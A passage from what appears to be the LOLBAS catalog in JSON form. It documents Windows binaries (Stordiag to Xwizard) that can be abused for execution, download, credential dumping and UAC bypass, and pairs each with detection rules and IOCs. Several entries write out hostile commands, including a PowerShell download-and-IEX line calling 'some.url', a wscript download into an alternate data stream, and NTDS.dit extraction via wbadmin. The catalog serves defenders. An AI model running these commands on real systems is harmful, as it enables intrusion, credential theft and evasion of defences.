execution."}],"Resources":[{"Link":"https://gtfobins.github.io/gtfobins/ssh/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Ssh/"},{"Name":"Stordiag.exe","Description":"Storage diagnostic tool","Author":"Eral4m","Created":"2021-10-21","Commands":[{"Command":"stordiag.exe","Description":"Once executed, Stordiag.exe will execute schtasks.exe systeminfo.exe and fltmc.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it.","Usecase":"Possible defence evasion purposes.","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"c:\\windows\\system32\\stordiag.exe"},{"Path":"c:\\windows\\syswow64\\stordiag.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_stordiag_susp_child_process.yml"},{"IOC":"systeminfo.exe, fltmc.exe or schtasks.exe being executed outside of their normal path of c:\\windows\\system32\\ or c:\\windows\\syswow64\\"}],"Resources":[{"Link":"https://twitter.com/eral4m/status/1451112385041911809"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Stordiag/"},{"Name":"SyncAppvPublishingServer.exe","Description":"Used by App-v to get App-v server lists","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"SyncAppvPublishingServer.exe \"n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX\"","Description":"Example command on how inject Powershell code into the process","Usecase":"Use SyncAppvPublishingServer as a Powershell host to execute Powershell code. Evade defensive counter measures","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 10 1709, Windows 10 1703, Windows 10 1607"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\SyncAppvPublishingServer.exe"},{"Path":"C:\\Windows\\SysWOW64\\SyncAppvPublishingServer.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml"},{"IOC":"SyncAppvPublishingServer.exe should never be in use unless App-V is deployed"}],"Resources":[{"Link":"https://twitter.com/monoxgas/status/895045566090010624"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/"},{"Name":"Tar.exe","Description":"Used by Windows to extract and create archives.","Author":"Brian Lucero","Created":"2023-01-30","Commands":[{"Command":"tar -cf compressedfilename:ads C:\\folder\\file","Description":"Compress one or more files to an alternate data stream (ADS).","Usecase":"Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows 10, Windows 11","Tags":[{"Type":"Compression"}]},{"Command":"tar -xf compressedfilename:ads","Description":"Decompress a compressed file from an alternate data stream (ADS).","Usecase":"Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows 10, Windows 11","Tags":[{"Type":"Compression"}]},{"Command":"tar -xf \\\\host1\\archive.tar","Description":"Extracts archive.tar from the remote (internal) host (host1) to the current host.","Usecase":"Copy files","Category":"Copy","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows 10, Windows 11","Tags":[{"Type":"Compression"}]}],"Full_Path":[{"Path":"C:\\Windows\\System32\\tar.exe"},{"Path":"C:\\Windows\\SysWOW64\\tar.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_tar_compression.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_tar_extraction.yml"},{"IOC":"tar.exe extracting files from a remote host within the environment"},{"IOC":"Abnormal processes spawning tar.exe"},{"IOC":"tar.exe interacting with alternate data streams (ADS)"}],"Resources":[{"Link":"https://twitter.com/Cyber_Sorcery/status/1619819249886969856"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Tar/"},{"Name":"Ttdinject.exe","Description":"Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)","Author":"Maxime Nadeau","Created":"2020-05-12","Commands":[{"Command":"TTDInject.exe /ClientParams \"7 tmp.run 0 0 0 0 0 0 0 0 0 0\" /Launch \"C:/Windows/System32/calc.exe\"","Description":"Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.","Usecase":"Spawn process using other binary","Category":"Execute","Privileges":"Administrator","MitreID":"T1127","OperatingSystem":"Windows 10 2004 and above, Windows 11"},{"Command":"ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams \"7 tmp.run 0 0 0 0 0 0 0 0 0 0\" /launch \"C:/Windows/System32/calc.exe\"","Description":"Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.","Usecase":"Spawn process using other binary","Category":"Execute","Privileges":"Administrator","MitreID":"T1127","OperatingSystem":"Windows 10 1909 and below"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\ttdinject.exe"},{"Path":"C:\\Windows\\Syswow64\\ttdinject.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/7ea6ed3db65e0bd812b051d9bb4fffd27c4c4d0a/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml"},{"IOC":"Parent child relationship. Ttdinject.exe parent for executed command"},{"IOC":"Multiple queries made to the IFEO registry key of an untrusted executable (Ex. \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\payload.exe\") from the ttdinject.exe process"}],"Resources":[{"Link":"https://twitter.com/Oddvarmoe/status/1196333160470138880"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/"},{"Name":"Tttracer.exe","Description":"Used by Windows 1809 and newer to Debug Time Travel","Author":"Oddvar Moe","Created":"2019-11-05","Commands":[{"Command":"tttracer.exe C:\\windows\\system32\\calc.exe","Description":"Execute calc using tttracer.exe. Requires administrator privileges","Usecase":"Spawn process using other binary","Category":"Execute","Privileges":"Administrator","MitreID":"T1127","OperatingSystem":"Windows 10 1809 and newer, Windows 11"},{"Command":"TTTracer.exe -dumpFull -attach pid","Description":"Dumps process using tttracer.exe. Requires administrator privileges","Usecase":"Dump process by PID","Category":"Dump","Privileges":"Administrator","MitreID":"T1003","OperatingSystem":"Windows 10 1809 and newer, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\tttracer.exe"},{"Path":"C:\\Windows\\SysWOW64\\tttracer.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_tttracer_mod_load.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"IOC":"Parent child relationship. Tttracer parent for executed command"}],"Resources":[{"Link":"https://twitter.com/oulusoyum/status/1191329746069655553"},{"Link":"https://twitter.com/mattifestation/status/1196390321783025666"},{"Link":"https://lists.samba.org/archive/cifs-protocol/2016-April/002877.html"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Tttracer/"},{"Name":"Unregmp2.exe","Description":"Microsoft Windows Media Player Setup Utility","Author":"Wade Hickey","Created":"2021-12-06","Commands":[{"Command":"rmdir %temp%\\lolbin /s /q 2>nul & mkdir \"%temp%\\lolbin\\Windows Media Player\" & copy C:\\Windows\\System32\\calc.exe \"%temp%\\lolbin\\Windows Media Player\\wmpnscfg.exe\" >nul && cmd /V /C \"set \"ProgramW6432=%temp%\\lolbin\" && unregmp2.exe /HideWMP\"","Description":"Allows an attacker to copy a target binary to a controlled directory and modify the 'ProgramW6432' environment variable to point to that controlled directory, then execute 'unregmp2.exe' with argument '/HideWMP' which will spawn a process at the hijacked path '%ProgramW6432%\\wmpnscfg.exe'.","Usecase":"Proxy execution of binary","Category":"Execute","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows 10"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\unregmp2.exe"},{"Path":"C:\\Windows\\SysWOW64\\unregmp2.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_unregmp2.yml"},{"IOC":"Low-prevalence binaries, with filename 'wmpnscfg.exe', spawned as child-processes of `unregmp2.exe /HideWMP`"}],"Resources":[{"Link":"https://twitter.com/notwhickey/status/1466588365336293385"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Unregmp2/"},{"Name":"vbc.exe","Description":"Binary file used for compile vbs code","Author":"Lior Adar","Created":"2020-02-27","Commands":[{"Command":"vbc.exe /target:exe c:\\temp\\vbs\\run.vb","Description":"Binary file used by .NET to compile Visual Basic code to an executable.","Usecase":"Compile attacker code on system. Bypass defensive counter measures.","Category":"Compile","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows 7, Windows 10, Windows 11","Tags":[{"Execute":"WSH"}]},{"Command":"vbc -reference:Microsoft.VisualBasic.dll c:\\temp\\vbs\\run.vb","Description":"Binary file used by .NET to compile Visual Basic code to an executable.","Usecase":"Compile attacker code on system. Bypass defensive counter measures.","Category":"Compile","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows 7, Windows 10, Windows 11","Tags":[{"Execute":"WSH"}]}],"Full_Path":[{"Path":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\vbc.exe"},{"Path":"C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\vbc.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml"}],"Resources":null,"url":"https://lolbas-project.github.io/lolbas/Binaries/Vbc/"},{"Name":"Verclsid.exe","Description":"Used to verify a COM object before it is instantiated by Windows Explorer","Author":"@bohops","Created":"2018-12-04","Commands":[{"Command":"verclsid.exe /S /C {CLSID}","Description":"Used to verify a COM object before it is instantiated by Windows Explorer","Usecase":"Run a com object created in registry to evade defensive counter measures","Category":"Execute","Privileges":"User","MitreID":"T1218.012","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\verclsid.exe"},{"Path":"C:\\Windows\\SysWOW64\\verclsid.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/verclsid_clsid_execution.yml"}],"Resources":[{"Link":"https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5"},{"Link":"https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Verclsid/"},{"Name":"Wab.exe","Description":"Windows address book manager","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"wab.exe","Description":"Change HKLM\\Software\\Microsoft\\WAB\\DLLPath and execute DLL of choice","Usecase":"Execute dll file. Bypass defensive counter measures","Category":"Execute","Privileges":"Administrator","MitreID":"T1218","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Program Files\\Windows Mail\\wab.exe"},{"Path":"C:\\Program Files (x86)\\Windows Mail\\wab.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml"},{"IOC":"WAB.exe should normally never be used"}],"Resources":[{"Link":"https://twitter.com/Hexacorn/status/991447379864932352"},{"Link":"http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Wab/"},{"Name":"wbadmin.exe","Description":"Windows Backup Administration utility","Author":"Chris Eastwood","Created":"2024-04-05","Commands":[{"Command":"wbadmin start backup -backupTarget:C:\\temp\\ -include:C:\\Windows\\NTDS\\NTDS.dit,C:\\Windows\\System32\\config\\SYSTEM -quiet","Description":"Extract NTDS.dit and SYSTEM hive into backup virtual hard drive file (.vhdx)","Usecase":"Snapshoting of Active Directory NTDS.dit database","Category":"Dump","Privileges":"Administrator, Backup Operators, SeBackupPrivilege","MitreID":"T1003.003","OperatingSystem":"Windows Server"},{"Command":"wbadmin start recovery -version:<VERSIONIDENTIFIER> -recoverytarget:C:\\temp -itemtype:file -items:C:\\Windows\\NTDS\\NTDS.dit,C:\\Windows\\System32\\config\\SYSTEM -notRestoreAcl -quiet","Description":"Restore a version of NTDS.dit and SYSTEM hive into file path. The command `wbadmin get versions` can be used to find version identifiers.","Usecase":"Dumping of Active Directory NTDS.dit database","Category":"Dump","Privileges":"Administrator, Backup Operators, SeBackupPrivilege","MitreID":"T1003.003","OperatingSystem":"Windows Server"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\wbadmin.exe"}],"Detection":[{"IOC":"wbadmin.exe command lines containing \"NTDS\" or \"NTDS.dit\""}],"Resources":[{"Link":"https://medium.com/r3d-buck3t/windows-privesc-with-sebackupprivilege-65d2cd1eb960"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Wbadmin/"},{"Name":"winget.exe","Description":"Windows Package Manager tool","Author":"Paul Sanders","Created":"2022-01-03","Commands":[{"Command":"winget.exe install --manifest manifest.yml","Description":"Downloads a file from the web address specified in manifest.yml and executes it on the system. Local manifest setting must be enabled in winget for it to work: \"winget settings --enable LocalManifestFiles\"","Usecase":"Download and execute an arbitrary file from the internet","Category":"Execute","Privileges":"Local Administrator - required to enable local manifest setting","MitreID":"T1105","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Users\\user\\AppData\\Local\\Microsoft\\WindowsApps\\winget.exe"}],"Detection":[{"IOC":"winget.exe spawned with local manifest file"},{"IOC":"Sysmon Event ID 1 - Process Creation"},{"Analysis":"https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winget_local_install_via_manifest.yml"}],"Resources":[{"Link":"https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html"},{"Link":"https://docs.microsoft.com/en-us/windows/package-manager/winget/#production-recommended"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Winget/"},{"Name":"Wlrmdr.exe","Description":"Windows Logon Reminder executable","Author":"Moshe Kaplan","Created":"2022-02-16","Commands":[{"Command":"wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u calc.exe","Description":"Execute calc.exe with wlrmdr.exe as parent process","Usecase":"Use wlrmdr as a proxy binary to evade defensive countermeasures","Category":"Execute","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"c:\\windows\\system32\\wlrmdr.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wlrmdr.yml"},{"IOC":"wlrmdr.exe spawning any new processes"}],"Resources":[{"Link":"https://twitter.com/0gtweet/status/1493963591745220608"},{"Link":"https://twitter.com/Oddvarmoe/status/927437787242090496"},{"Link":"https://twitter.com/falsneg/status/1461625526640992260"},{"Link":"https://docs.microsoft.com/en-us/windows/win32/api/shellapi/ns-shellapi-notifyicondataw"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Wlrmdr/"},{"Name":"Wmic.exe","Description":"The WMI command-line (WMIC) utility provides a command-line interface for WMI","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"wmic.exe process call create \"c:\\ads\\file.txt:program.exe\"","Description":"Execute a .EXE file stored as an Alternate Data Stream (ADS)","Usecase":"Execute binary file hidden in Alternate data streams to evade defensive counter measures","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"wmic.exe process call create calc","Description":"Execute calc from wmic","Usecase":"Execute binary from wmic to evade defensive counter measures","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"wmic.exe /node:\"192.168.0.1\" process call create \"evil.exe\"","Description":"Execute evil.exe on the remote system.","Usecase":"Execute binary on a remote system","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"wmic.exe process get brief /format:\"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl\"","Description":"Create a volume shadow copy of NTDS.dit that can be copied.","Usecase":"Execute binary on remote system","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"wmic.exe process get brief /format:\"\\\\127.0.0.1\\c$\\Tools\\pocremote.xsl\"","Description":"Executes JScript or VBScript embedded in the target remote XSL stylsheet.","Usecase":"Execute script from remote system","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Execute":"WSH"}]}],"Full_Path":[{"Path":"C:\\Windows\\System32\\wbem\\wmic.exe"},{"Path":"C:\\Windows\\SysWOW64\\wbem\\wmic.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"Splunk":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml"},{"BlockRule":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"IOC":"Wmic retrieving scripts from remote system/Internet location"},{"IOC":"DotNet CLR libraries loaded into wmic.exe"},{"IOC":"DotNet CLR Usage Log - wmic.exe.log"}],"Resources":[{"Link":"https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory"},{"Link":"https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html"},{"Link":"https://twitter.com/subTee/status/986234811944648707"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Wmic/"},{"Name":"WorkFolders.exe","Description":"Work Folders","Author":"Elliot Killick","Created":"2021-08-16","Commands":[{"Command":"WorkFolders","Description":"Execute control.exe in the current working directory","Usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\WorkFolders.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_workfolders.yml"},{"IOC":"WorkFolders.exe should not be run on a normal workstation"}],"Resources":[{"Link":"https://www.ctus.io/2021/04/12/exploading/"},{"Link":"https://twitter.com/ElliotKillick/status/1449812843772227588"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/WorkFolders/"},{"Name":"Wscript.exe","Description":"Used by Windows to execute scripts","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"wscript //e:vbscript c:\\ads\\file.txt:script.vbs","Description":"Execute script stored in an alternate data stream","Usecase":"Execute hidden code to evade defensive counter measures","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Execute":"WSH"}]},{"Command":"echo GetObject(\"script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js\") > %temp%\\test.txt:hi.js && wscript.exe %temp%\\test.txt:hi.js","Description":"Download and execute script stored in an alternate data stream","Usecase":"Execute hidden code to evade defensive counter measures","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\wscript.exe"},{"Path":"C:\\Windows\\SysWOW64\\wscript.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"Splunk":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml"},{"BlockRule":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"IOC":"Wscript.exe executing code from alternate data streams"},{"IOC":"DotNet CLR libraries loaded into wscript.exe"},{"IOC":"DotNet CLR Usage Log - wscript.exe.log"}],"Resources":[{"Link":"https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Wscript/"},{"Name":"Wsreset.exe","Description":"Used to reset Windows Store settings according to its manifest file","Author":"Oddvar Moe","Created":"2019-03-18","Commands":[{"Command":"wsreset.exe","Description":"During startup, wsreset.exe checks the registry value HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command for the command to run. Binary will be executed as a high-integrity process without a UAC prompt being displayed to the user.","Usecase":"Execute a binary or script as a high-integrity process without a UAC prompt.","Category":"UAC Bypass","Privileges":"User","MitreID":"T1548.002","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\wsreset.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml#"},{"Splunk":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/wsreset_uac_bypass.yml"},{"IOC":"wsreset.exe launching child process other than mmc.exe"},{"IOC":"Creation or modification of the registry value HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"},{"IOC":"Microsoft Defender Antivirus as Behavior:Win32/UACBypassExp.T!gen"}],"Resources":[{"Link":"https://www.activecyber.us/activelabs/windows-uac-bypass"},{"Link":"https://twitter.com/ihack4falafel/status/1106644790114947073"},{"Link":"https://github.com/hfiref0x/UACME/blob/master/README.md"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Wsreset/"},{"Name":"wuauclt.exe","Description":"Windows Update Client","Author":"David Middlehurst","Created":"2020-09-23","Commands":[{"Command":"wuauclt.exe /UpdateDeploymentProvider Full_Path_To_DLL /RunHandlerComServer","Description":"Full_Path_To_DLL would be the absolute path to .DLL file and would execute code on attach.","Usecase":"Execute dll via attach/detach methods","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 10","Tags":[{"Execute":"DLL"}]}],"Full_Path":[{"Path":"C:\\Windows\\System32\\wuauclt.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wuauclt.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wuauclt_execution.yml"},{"IOC":"wuauclt run with a parameter of a DLL path"},{"IOC":"Suspicious wuauclt Internet/network connections"}],"Resources":[{"Link":"https://dtm.uk/wuauclt/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Wuauclt/"},{"Name":"Xwizard.exe","Description":"Execute custom class that has been added to the registry or download a file with Xwizard.exe","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}","Description":"Xwizard.exe running a custom class that has been added to the registry.","Usecase":"Run a com object created in registry to evade defensive counter measures","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}","Description":"Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.","Usecase":"Run a com object created in registry to evade defensive counter measures","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM","Description":"Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache.","Usecase":"Download file from Internet","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows 10, Windows 